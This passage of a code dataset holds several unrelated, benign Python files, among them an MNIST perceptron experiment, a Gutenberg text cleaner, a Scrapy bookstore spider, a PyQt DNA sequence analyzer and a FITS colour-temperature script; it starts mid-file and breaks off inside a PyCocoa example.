tf.compat.v1.placeholder(dtype=tf.float32,shape=[28*28])\n\n weight = tf.multiply(data_train,label_train)\n\n weights = np.zeros(28*28)\n bias = 0\n for i in range(0,iteration):\n for j in range(0,len(train_data)):\n predict = prediction(train_data[j],weights,bias)\n if predict != train_label[j][0]:\n weights += session.run(weight,feed_dict={data_train:train_data[j],label_train:train_label[j]})\n bias += train_label[j][0]\n\n return accuracy(test_data,test_label,weights,bias),weights\n\ndef extract_data(train_images,train_labels,test_images,test_labels,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num1's\n if num_count < 500 and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num2's\n if num_count < 500 and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num_count += 1\n num_count = 0\n #Testing data\n for i in range(len(test_labels)):\n if num_count < 500 and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(test_labels)):\n #extract only num2's\n if num_count < 500 and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num_count += 1\n return image_train,label_train,image_test,label_test\n\ndef extract_data_shuffled(train_images,train_labels,test_images,test_labels,count,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num1_count,num2_count = 0,0\n for i in range(len(train_labels)):\n #extract only num1's\n if num1_count < count and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n 
num1_count += 1\n #extract only num2's\n if num2_count < count and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num2_count += 1\n\n #shuffle training data\n train = list(zip(image_train,label_train))\n shuffle(train)\n image_train, label_train = zip(*train)\n\n #Testing data\n num1_count,num2_count = 0,0\n for i in range(len(test_labels)):\n if num1_count < count and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num1_count += 1\n #extract only num2's\n if num2_count < count and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num2_count += 1\n #shuffle testing data\n test = list(zip(image_test,label_test))\n shuffle(test)\n image_test, label_test = zip(*test)\n\n return image_train,label_train,image_test,label_test\n\ndef accuracy_iteration(train_data,train_label,test_data,test_label,iteration,num1,num2):\n\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"accuracy_iteration%s_%s%s.png\" %(iteration,num1,num2)\n plot.savefig(plot_name)\n\ndef get_score(train_images,train_labels,test_images,test_labels,iteration,num1,num2):\n weights = perceptron(train_images,train_labels,test_images,test_labels,iteration)[1]\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(weights[i])\n else:\n weight_neg.append(0)\n\n pos_test, neg_test = [], []\n\n for i in range(len(test_labels)):\n if test_labels[i][0] == num1:\n pos_test.append(test_images[i])\n else:\n neg_test.append(test_images[i])\n #calculate score for num1 images\n score_pos = []\n for i in range(len(pos_test)):\n score = 0\n for j in range(len(pos_test[i])):\n score += abs(weight_pos[j] - pos_test[i][j])\n score_pos.append(score)\n #calculate score for num2 images\n score_neg = []\n for i in range(len(neg_test)):\n score = 0\n for j in range(len(neg_test[i])):\n score += abs(weight_neg[j] - neg_test[i][j])\n score_neg.append(score)\n\n pos_test_score = list(zip(pos_test,score_pos))\n pos_test_score = sorted(pos_test_score,key=itemgetter(1),reverse = True)\n #20 best num1\n best_pos = []\n best_pos_arr = pos_test_score[0:20]\n for i in range(len(best_pos_arr)):\n best_pos.append(best_pos_arr[i][0])\n\n worst_pos_arr = pos_test_score[-21:-1]\n worst_pos = []\n for i in range(len(worst_pos_arr)):\n worst_pos.append(worst_pos_arr[i][0])\n\n neg_test_score = list(zip(neg_test,score_neg))\n neg_test_score = sorted(neg_test_score,key = itemgetter(1),reverse = True)\n #20 best num2\n best_neg = []\n best_neg_arr = neg_test_score[0:20]\n for i in range(len(best_neg_arr)):\n best_neg.append(best_neg_arr[i][0])\n #20 worst num2\n worst_neg = []\n worst_neg_arr = neg_test_score[-21:-1]\n for i in range(len(worst_neg_arr)):\n worst_neg.append(worst_neg_arr[i][0])\n\n #image plot for num1 best 20\n for i in range(len(best_pos)):\n temp = []\n for j in range(0,len(best_pos[i]),28):\n temp.append(best_pos[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num1 worst 20\n for i in range(len(worst_pos)):\n temp = []\n for j in range(0,len(worst_pos[i]),28):\n 
temp.append(worst_pos[i][j:j+28])\n plot.subplot(4,5,i+1)\n plot.imshow(temp,'gray_r')\n plt_name = \"worst_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num2 best 20\n for i in range(len(best_neg)):\n temp = []\n for j in range(0,len(best_neg[i]),28):\n temp.append(best_neg[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num2)\n plot.savefig(plt_name)\n\n #image plot for num2 worst 20\n for i in range(len(worst_neg)):\n temp = []\n for j in range(0,len(worst_neg[i]),28):\n temp.append(worst_neg[i][j:j+28])\n plot.subplot(4,5,i+1)\n plot.imshow(temp,'gray_r')\n plt_name = \"worst_20_%s.png\"%(num2)\n plot.savefig(plt_name)\n\ndef visualize_weight_vector(train_data,train_label,test_data,test_label,iteration,num1,num2):\n weights = perceptron(train_data,train_label,test_data,test_label,iteration)[1]\n\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(abs(weights[i]))\n else:\n weight_neg.append(0)\n pos_weight,neg_weight = [],[]\n\n for i in range(0,len(weight_pos),28):\n pos_weight.append(weight_pos[i:i+28])\n for i in range(0,len(weight_neg),28):\n neg_weight.append(weight_neg[i:i+28])\n\n plot.imshow(pos_weight,'gray_r')\n plt_name = \"weight_%s.png\"%(num1)\n plot.savefig(plt_name)\n plot.imshow(neg_weight,'gray_r')\n plt_name = \"weight_%s.png\"%(num2)\n plot.savefig(plt_name)\n \n \ndef sorted_data_visualization(train_data,train_label,test_data,test_label,iteration,num1,num2):\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"sorted_accuracy_iteration%s%s.png\" %(num1,num2)\n plot.savefig(plot_name)\n\ndef random_flip(train_data,train_label,test_data,test_label,iteration): #functon for random flip\n index = sample(range(1000), 100)\n\n for i in index:\n if train_label[i] == [1]:\n train_label[i][0] = -1\n else:\n train_label[i][0] = 1\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot.savefig('accuracy_random_flip.png')\n return perceptron(train_data,train_label,test_data,test_label,iteration)[0]\n\n\n\ndef main():\n print(\"Importing MNIST Dataset\")\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,1,6)\n\n print(\"(a). Accuracy for classifying digits 1 and 6\\n(b). Accuracy plot with number of iterations for classifying digits 1 and 6\\n(c). Visualization of learned model for digits 1 and 6\\n(d). Visualization of 20 best and worst scoring images\\n(e). Random flip for 10% of training data\\n(f). Visualization of sorted training data\\n(g). Accuracy plot for digits 2 and 8\\n(h). Weight vector Visualization for digits 2 and 8\\n(i). 
Accuracy plot with 10 training examples\\n\")\n\n choice = input(\"***Please enter your choice from a to i***\")\n if choice == 'a':\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,6)[0]\n print(\"Accuracy for classifying digits 1 and 6 is:\",accuracy)\n elif choice == 'b':\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Accuracy-iteration plot for digits 1 and 6 ploted!\")\n elif choice == 'c':\n visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Learned model for digits 1 and 6 plotted!\")\n elif choice == 'd':\n print(\"Image plot for best and worst 20 images\")\n get_score(train_images,train_labels,test_images,test_labels,10,1,6)\n elif choice == 'e':\n accuracy_random = random_flip(train_images,train_labels,test_images,test_labels,10)\n print(\"Accuracy for classifying digits 1 and 6 with 10%\\ random flip\",accuracy_random)\n print(\"Accuracy plot with 10% \\error plotted!\")\n elif choice == 'f':\n train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted = extract_data(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,1,6)\n sorted_data_visualization(train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted,10,1,6)\n print(\"Accuracy plot with sorted data plotted!\")\n elif choice == 'g':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,2,8)\n print(\"Accuracy-iteration plot for digits 2 and 8 plotted!\")\n elif choice == 'h':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n print(\"Accuracy for digits 2 and 8\",accuracy)\n visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,2,8)\n print(\"Learned model for digits 2 and 8 plotted!\")\n elif choice == 'i':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,5,1,6)\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n print(\"Accuracy with 10 training examples\",accuracy)\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Plot for 10 training examples plotted!!\")\n\n\n\n\n\nif __name__ ==\"__main__\":\n main()\n","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":13686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"157695190","text":"#!/usr/bin/python\nimport re\nimport os\nfrom optparse import OptionParser\nfrom os.path import basename\n\n# Delimiters for unwanted content\nhead_delim = \"\\*\\*\\* START OF THIS PROJECT GUTENBERG EBOOK .*\"\ntail_delim = \"\\*\\*\\* END OF THIS PROJECT GUTENBERG EBOOK .*\"\n\nprod_delim = \"produced by .*\"\nend_delim = \"End of Project Gutenberg.*\"\n\nout_path = \"\" # Path to the output directory\nout_suff = \"\" # Suffix of the output files\n\n# Load the file contents as a string\ndef load_file(fname):\n # Open file and load contents\n with open(fname) as f:\n contents = f.read()\n\n # Return file contents\n return contents\n\n# Generate the name of the output file\ndef 
gen_out_file_name(fname):\n # Strip filename and file extension\n fp, ext = os.path.splitext(fname)\n \n # Rename the file\n of = os.path.basename(fp) + out_suff + ext\n\n # Return the new file path\n return os.path.join(out_path, of)\n\n# Strip the head and tail from the file contents\ndef chomp_head_tail(contents, h_delim, t_delim, flgs=0):\n # Strip head\n contents = re.split(h_delim, contents, maxsplit=1, flags=flgs)\n contents = contents[1] if len(contents) > 1 else contents[0]\n\n # Strip tail\n contents = re.split(t_delim, contents, maxsplit=1, flags=flgs)\n contents = contents[0]\n\n return contents.rstrip().lstrip()\n \n# Strip Project Gutenberg's copyrite information\ndef gutstrip(contents):\n contents = chomp_head_tail(contents, head_delim, tail_delim)\n contents = chomp_head_tail(contents, prod_delim, end_delim, re.IGNORECASE)\n return contents\n\n# Write the document contents to a file\ndef write_to_file(fname, contents):\n with open(fname, \"w\") as f:\n f.write(contents)\n\n# Load file contents, remove copyrite and write to disk\ndef strip(fname):\n # Generate the name of the output file\n contents = load_file(fname)\n contents = gutstrip(contents)\n write_to_file(gen_out_file_name(fname), contents)\n\nif __name__ == \"__main__\":\n # Deal with optional arguments\n parser = OptionParser(usage=\"usage: %prog [options] [FILE]...\")\n parser.add_option(\"-s\", \"--suffix\", dest=\"out_suff\", help=\"Suffix attached to the name of the output file\", default=\"_clean\")\n parser.add_option(\"-o\", \"--output\", dest=\"out_path\", help=\"Destination directory for all output files\", default=\".\")\n\n (options, args) = parser.parse_args()\n\n out_path = options.out_path\n out_suff = options.out_suff\n\n for i in args:\n strip(i)\n\n print (\"Done\")\n","sub_path":"gutstrip.py","file_name":"gutstrip.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"181737761","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/10/21 21:44\n# @Author : lirixiang\n# @Email : 565539277@qq.com\n# @File : findFriendNum.py\nclass Solution:\n def findFriendNum(self, M):\n def dfs(x, y, n, m):\n if not (0 <= x < n and 0 <= y < m) or M[x][y] != 1:\n return\n M[x][y] = '2'\n dfs(x - 1, y, n, m)\n dfs(x + 1, y, n, m)\n dfs(x, y - 1, n, m)\n dfs(x, y + 1, n, m)\n\n if len(M) == 0 or len(M[0]) == 0:\n return 0\n res = 0\n n = len(M)\n m = len(M[0])\n for i in range(n):\n for j in range(m):\n if M[i][j] != 1:\n continue\n dfs(i, j, n, m)\n res += 1\n return res\n\n","sub_path":"src/笔试面试/findFriendNum.py","file_name":"findFriendNum.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"585934934","text":"import pandas as pd \nfrom postgresql import pgConnect, pgEngine\n\ndf = pd.read_csv('global_superstore.csv')\nprint(df.head())\n\n# Initiate PostgreSQL connection to DB\nconn = pgConnect()\ncur = conn.cursor()\n\n# PostgreSQL connection doesn't work with Pandas so have initiated this engine as well with SQLAlchemy\nengine = pgEngine()\n\ndf.to_sql('global_superstore',engine, schema='prototyping',if_exists='replace')\nprint('Successfully loaded data')","sub_path":"load_file.py","file_name":"load_file.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"41728479","text":"# Copyright (c) 2015 Thales Services SAS\n# 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport fixtures\nimport testscenarios\n\nfrom neutron.tests import base\nfrom neutron.tests import tools\n\n\nclass NoErrorFixture(tools.SafeFixture):\n\n def __init__(self):\n super(NoErrorFixture, self).__init__()\n self.cleaned = False\n self.called = False\n\n def setUp(self):\n super(NoErrorFixture, self).setUp()\n self.called = True\n\n def cleanUp(self):\n self.cleaned = True\n super(NoErrorFixture, self).cleanUp()\n\n\nclass ErrorAfterFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n super(tools.SafeFixture, self).setUp()\n raise ValueError\n\n\nclass ErrorBeforeFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n raise ValueError\n\n\nclass TestSafeFixture(testscenarios.WithScenarios, base.BaseTestCase):\n scenarios = [\n ('testtools useFixture', dict(fixtures=False)),\n ('fixtures useFixture', dict(fixtures=True)),\n ]\n\n def setUp(self):\n super(TestSafeFixture, self).setUp()\n if self.fixtures:\n self.parent = self.useFixture(fixtures.Fixture())\n else:\n self.parent = self\n\n def test_no_error(self):\n fixture = NoErrorFixture()\n self.parent.useFixture(fixture)\n self.assertTrue(fixture.called)\n self.assertFalse(fixture.cleaned)\n\n def test_error_after_root_setup(self):\n fixture = ErrorAfterFixtureSetup()\n self.assertRaises(ValueError, self.parent.useFixture, fixture)\n self.assertTrue(fixture.cleaned)\n\n def test_error_before_root_setup(self):\n fixture = ErrorBeforeFixtureSetup()\n # NOTE(cbrandily); testtools.useFixture crashs badly if Fixture.setUp\n # is not called or fails.\n self.assertRaises(AttributeError, self.parent.useFixture, fixture)\n self.assertFalse(fixture.cleaned)\n","sub_path":"neutron/tests/functional/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"250950706","text":"\"\"\"\r\n--main Gui File--\r\n\r\nThe gui class creates the functionality for the gui.ui file.\r\n\r\nAllows a user to graphically import a seqence, analyze that seqence then\r\nrandomize as needed. 
Not very much error handling implemented so far.\r\n\r\nCurrently underdevelopment\r\n\r\n\"\"\"\r\n\r\n\r\n#Metadata\r\n__author__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__credits__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__email__ = \"showes@unbc.ca, velde@unbc.ca\"\r\n__python_version__ = \"3.9.0\"\r\n\r\n\r\n#imports\r\nimport sys\r\nimport os\r\nfrom seq_analyzer import seq_analyzer\r\nfrom seq_randomizer import seq_randomizer\r\nfrom Bio.SeqUtils import GC\r\nfrom Bio.Seq import Seq\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtWidgets import QTableWidgetItem\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtCore import pyqtSlot\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom PyQt5.uic import loadUi\r\n\r\n\r\n#the seq_gui class\r\nclass seq_gui(QWidget):\r\n\r\n\r\n #constructor\r\n def __init__(self):\r\n super(seq_gui, self).__init__()\r\n loadUi(\"GUIs/gui.ui\", self)\r\n self._load_connects()\r\n self.move(20,20)\r\n self.randomizer = seq_randomizer()\r\n\r\n\r\n #loads the connection for the buttons\r\n def _load_connects(self):\r\n\r\n #bttn_create connects\r\n self.bttn_openSeq.clicked.connect(self.bttn_openSeq_clicked)\r\n self.bttn_save.clicked.connect(self.bttn_save_clicked)\r\n self.bttn_clearSeq.clicked.connect(self.bttn_clearSeq_clicked)\r\n self.bttn_randomize.clicked.connect(self.bttn_randomize_clicked)\r\n self.bttn_analyze.clicked.connect(self.bttn_analyze_clicked)\r\n\r\n\r\n #creates the functionality for the Open button\r\n @pyqtSlot()\r\n def bttn_openSeq_clicked(self):\r\n path, _ = QFileDialog.getOpenFileName(None, \"Load Sequence\", \"\", \"Text Files (*.txt)\")\r\n if path:\r\n file = open(path, \"r\")\r\n contents = file.read()\r\n self.textEdit_seq.setText(contents)\r\n\r\n\r\n #creates the functionality for the Save button\r\n @pyqtSlot()\r\n def bttn_save_clicked(self):\r\n path, _ = QFileDialog.getSaveFileName(None, \"Save Sequence\", \"\", \"*.txt\")\r\n if path:\r\n file = open(path, \"w+\")\r\n contents = self.textEdit_seq.toPlainText()\r\n file.write(contents)\r\n file.close()\r\n\r\n\r\n #creates the functionality for the clear button\r\n @pyqtSlot()\r\n def bttn_clearSeq_clicked(self):\r\n self.textEdit_seq.clear()\r\n\r\n\r\n #creates the functionality for the Randomize button\r\n @pyqtSlot()\r\n def bttn_randomize_clicked(self):\r\n\r\n #getting the sequence\r\n seq = self.textEdit_seq.toPlainText()\r\n\r\n #making seq uppercase\r\n seq = seq.upper()\r\n\r\n #valid character check\r\n if self._seqCheck(seq):\r\n\r\n #getting the randomization percentage\r\n randPercent = int(self.label_rand.text())\r\n\r\n #getting amino chain from original sequence\r\n proteinSeq = Seq(seq)\r\n oldAnimoChain = str(proteinSeq.translate())\r\n\r\n #randomiztion process\r\n newSeq = self.randomizer.randomize(seq, randPercent)\r\n\r\n #getting new amino chain\r\n newProteinSeq = Seq(newSeq)\r\n newAnimoChain = str(newProteinSeq.translate())\r\n\r\n #comparing chains\r\n #and updating textedit field and analyzing\r\n if newAnimoChain == oldAnimoChain:\r\n self.textEdit_seq.setText(newSeq)\r\n self._analyzeSequence(newSeq)\r\n else:\r\n self._errorMessage(\"Animo Acid Chain MisMatch\")\r\n self.textEdit_aminoSeq.setText(\"Animo Acid Chain MisMatch!\")\r\n\r\n else:\r\n #Error Message\r\n self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n #creates the functionality for the Analyze Sequence button\r\n @pyqtSlot()\r\n def 
bttn_analyze_clicked(self):\r\n\r\n #getting the sequence from the text edit boxn\r\n seq = self.textEdit_seq.toPlainText()\r\n\r\n #making seq upper case\r\n seq = seq.upper()\r\n\r\n #checking for valid valid characters\r\n if self._seqCheck(seq):\r\n #calling private analysis functionality\r\n self._analyzeSequence(seq)\r\n\r\n else:\r\n #Error Message\r\n self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n #This function does the analysis on the Sequence in textEdit_seq\r\n def _analyzeSequence(self, sequence):\r\n\r\n #getting sequence length and adding it to character count\r\n self.label_charVal.setText(str(len(sequence)))\r\n\r\n #getting GC richness using biopython\r\n self.label_gcVal.setText(str(round(GC(sequence), 2)))\r\n\r\n #getting Amino Acid composition\r\n protein_seq = Seq(sequence)\r\n self.textEdit_aminoSeq.setText(str(protein_seq.translate()))\r\n\r\n #using seq_analyzer to mine Sequence, returns list of lists\r\n substrings = seq_analyzer.mineSequence(self, sequence, int(self.label_minSubSize.text()), int(self.label_maxSubSize.text()), int(self.label_minOccVal.text()))\r\n\r\n #filling the table\r\n self._populateTable(substrings)\r\n\r\n\r\n #populates the table_subString\r\n def _populateTable(self, list):\r\n\r\n #clearing the table\r\n self.table_subString.setRowCount(0)\r\n\r\n #setting the row count to start adding info\r\n row = 0\r\n\r\n #setting the row count to the number of items\r\n self.table_subString.setRowCount(len(list))\r\n\r\n #adding items\r\n for strings in list:\r\n self.table_subString.setItem(row , 0, QTableWidgetItem(str(strings[0])))\r\n self.table_subString.setItem(row , 1, QTableWidgetItem(str(strings[1])))\r\n self.table_subString.setItem(row , 2, QTableWidgetItem(str(strings[2])))\r\n row = row + 1\r\n\r\n #sorting items by % of sequence\r\n self.table_subString.sortItems(2, Qt.DescendingOrder)\r\n\r\n\r\n #Error Message function\r\n #only parameter is a string which is the Message\r\n def _errorMessage(self, message):\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Error Message Box\")\r\n msg.setIcon(QMessageBox.Warning)\r\n msg.setText(\"----- AN ERROR HAS OCCURED -----\")\r\n msg.setInformativeText(message)\r\n msg.exec()\r\n\r\n\r\n #this function check that a sequence is only composed of G's C's A's T's\r\n #not very efficient but does the job\r\n def _seqCheck(self, sequence):\r\n validChars = \"GCAT\"\r\n return all(chars in validChars for chars in sequence)\r\n","sub_path":"src/seq_gui.py","file_name":"seq_gui.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"64046410","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom dangdang.items import DangdangItem\n\nclass DangSpider(scrapy.Spider):\n name = 'dang'\n allowed_domains = ['bang.dangdang.com']\n start_urls = ['http://bang.dangdang.com/']\n\n def start_requests(self):\n base_url = 'http://bang.dangdang.com/books/bestsellers/01.00.00.00.00.00-month-2020-5-1-1'\n for i in range(1,3):\n url = base_url.replace(base_url[-1],str(i))\n yield scrapy.Request(url,self.parse)\n\n def parse(self, response):\n data_list = response.xpath('//ul[contains(@class,\"bang_list_mode\")]/li')\n for data in data_list:\n item = DangdangItem()\n item['ranking'] = data.xpath('./div[contains(@class,\"list_num\")]/text()').extract_first()\n item[\"book_name\"] = data.xpath('./div[@class=\"name\"]/a/text()').extract_first()\n item[\"pic_url\"] = 
data.xpath('./div[@class=\"pic\"]/a/@href').extract_first()\n item[\"comment_num\"] = data.xpath('./div[@class=\"star\"]/a/text()').extract_first()\n item[\"publisher_time\"] = data.xpath('./div[@class=\"publisher_info\"][2]/span/text()').extract_first()\n item[\"publisher_name\"] = data.xpath('./div[@class=\"publisher_info\"][2]/a/text()').extract_first()\n item['price'] = data.xpath('./div[@class=\"price\"]/p[1]/span[1]/text()').extract_first()\n yield item\n","sub_path":"爬虫框���scrapy相关/dangdang/dangdang/spiders/dang.py","file_name":"dang.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"291641998","text":"import pyfits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\nfrom astropy.io import fits\n\ndata1 = pyfits.getdata('4imAF.fits') \ndata2 = pyfits.getdata('3imAF.fits')\n\n#set a noise floor for the image. Poor SNR pixels will give you bad temperature measurements.\nfloor1 = 0.045\nfloor2 = 0.070\n\n\n#set low SNR pixels to nans\nav1 = np.where(data1 < floor1)\ndata1[av1] = np.nan\n\n#set low SNR pixels to nans\nav2 = np.where(data2 < floor2)\ndata2[av2] = np.nan\n\n#Color temperatures\n\n#extinction factor for the images (provided by Matt)\nbg1 = 2.58\nbg2 = 1.54\n\n#Bg from Fit3.py code, aka. fitting the histogram\n #I_1Bg = Band 3 background Intensity\n #I_2Bg = Band 4 background Intensity\nI_1Bg = 325\nI_2Bg = 1261\n\n#wavelengths of first image in cm for cgs\nl1 = 12e-4\nl2 = 22e-4\n\n#set constants (in cgs)\nc = 3e10\nh = 6.626e-27\nc = 2.9979e10\nkb = 1.38e-16\n\n#convert wavelengths of images to frequencies\nv1 = c / l1\nv2 = c / l2\n\n#define function for b_nu that we will solve for T\nfunc = lambda T : (v1/v2)**5*(np.expm1((h*v2)/(kb*T)))/(np.expm1((h*v1)/(kb*T)))-I_1/I_2\n\n#provide an initial guess for T for the solver to use. \nTinit = 100.0\n\n#get the shape of the images so we know how big to make the for loop\nshp = np.shape(data1)\n\n#create a new empty array to store the temperature values\nTim = np.zeros((shp[0],shp[1]))\n\nfor i in range (0,shp[0]):\n for j in range (0,shp[1]):\n\n #store the pixel values from the images\n I_1 = data1[i,j]\n I_2 = data2[i,j]\n \n #apply the extinction factors\n I_1 = I_1*bg1\n I_2 = I_2*bg2\n \n #use the solver to find the temperatures\n TS = fsolve(func,Tinit)\n \n #store the values in the array\n Tim[i,j] = TS\n\n#Where the solver returned Tinit, turn into a nan. 
\nTim[Tim == Tinit] = np.nan\n\n#Creating a new array\nhdu = fits.PrimaryHDU(Tim)\nhdulist = fits.HDUList([hdu])\nhdulist.writeto('1_ColorTempAF_5.fits')\n\n#plot the color temperature map\nplt.figure()\nplt.title('Color-Tempature Map')\nplt.imshow(Tim[::-1])\n#plt.clim(lowval, highval)\nplt.colorbar()\nplt.show()\n\n\n\n#fits.writeto('out.fits', data, header)\n","sub_path":"Code3.py","file_name":"Code3.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"17688858","text":"import json\nimport os.path as osp\nimport sys\n\nids = list()\n\nfor line in open(osp.join('/home/wynmew/workspace/Data', 'trainSet')):\n ids.append(('/home/wynmew/workspace/Data', line.strip()))\n\nfor index in range(len(ids)-1):\n img_id = ids[index]\n annofile = osp.join(img_id[0], img_id[1]).replace(\"images\", \"annotations\").replace('.jpg', '.json')\n with open(annofile) as datafile:\n AnnoData = json.load(datafile)\n #print(annofile)\n # print(AnnoData)\n try:\n label=AnnoData[\"annotations\"][0][\"name\"]\n except:\n print(annofile)","sub_path":"jsonchecker.py","file_name":"jsonchecker.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"242630541","text":"\n# -*- coding: utf-8 -*-\n\n# Originally \n\n# Example of using PyCocoa to create an NSWindow with\n# an application menu item for quitting.\n\nimport run as _ # PYCHOK sys.path\n# all imports listed explicitly to help PyChecker\nfrom pycocoa import NSAlternateKeyMask, NSApplication, NSAutoreleasePool, \\\n NSBackingStoreBuffered, NSControlKeyMask, NSMakeRect, \\\n NSMenu, NSMenuItem, NSStr, NSWindowStyleMaskUsual, \\\n NSWindow, get_selector, terminating\n\n__version__ = '23.01.18'\n\n\ndef create_window(title=''):\n frame = NSMakeRect(10, 100, 500, 100)\n window = NSWindow.alloc().initWithContentRect_styleMask_backing_defer_(\n frame,\n NSWindowStyleMaskUsual,\n NSBackingStoreBuffered,\n 0)\n window.setTitle_(NSStr(title))\n window.makeKeyAndOrderFront_(None)\n return window\n\n\ndef create_menu(name='', app=None):\n menubar = NSMenu.alloc().init()\n appMenuItem = NSMenuItem.alloc().init()\n menubar.addItem_(appMenuItem)\n appMenu = NSMenu.alloc().init()\n\n fullItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Full Screen'), get_selector('enterFullScreenMode:'), NSStr('f'))\n fullItem.setKeyEquivalentModifierMask_(NSControlKeyMask) # Ctrl-Cmd-F\n appMenu.addItem_(fullItem)\n\n appMenu.addItem_(NSMenuItem.separatorItem())\n\n hideItem = 